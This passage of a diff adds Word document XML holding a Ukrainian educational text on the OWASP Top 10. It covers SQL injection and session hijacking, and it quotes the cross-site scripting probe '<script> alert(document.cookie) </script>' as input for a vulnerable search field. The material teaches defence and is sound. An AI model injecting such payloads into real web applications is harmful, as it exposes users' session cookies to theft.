+        <w:t xml:space="preserve"> перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ім того, часто буває, що ту чи іншу вразливість можна віднести відразу до декількох категорій.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Список</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>є</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>кращою</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>практикою</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>усунення</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>вразливостей</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Web-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>додатків</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, отже розглянемо дані вразливості:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Ін’єкція</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> коду</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Ін’єкція коду завжди бул</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займа</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>є</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> верхню строчку списку OWASP. Існує безліч різновидів цієї у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>разливості, але до сих пір самою сумнозвісною</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> з них є </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>н’єкція</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL-коду. Вона </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатк</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> не відфільтровує </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>дані</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>2. Некоректна аутентифікація і управління сеансами</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Друга найбільш небезпечна уразливість в списку OWASP пов'язана з методами аутентифікації і захисту користувальницьких сеансів в Web-додатку. Існує безліч типів цієї уразливості, одним з яких є несанкціоноване використання сеансу.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Несанкціоноване використання сеансу</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ікованим</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> користувачем і скомпрометувати його обліковий запис. Якщо додаток недостатньо добре захищає ідентифікатори сеансів (наприклад, відображає ідентифікатори всередині URL-адреси замість використання cookie-файлів), то зловмиснику дуже просто отримати ідентифікатор сеансу, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:strike/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обдуривши</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> користувача.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Навіть якщо Web-додаток зберігає ідентифікатори сеансів в cookie-файлах, зловмисник все одно може отримати потрібну інформацію з локальних файлів користувача, хитрістю змусивши його виконати замаскований сценарій. За допомогою простого сценарію можна витягти ідентифікатор сеансу, що зберігається в cookie-файлі на комп'ютері користувача; наприклад, можна отримати ідентифікатор сеансу за допомогою наступного сценарію, введеного в поле пошуку уразливого Web-додатки: &lt;script&gt; alert (document.cookie) &lt;/ script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
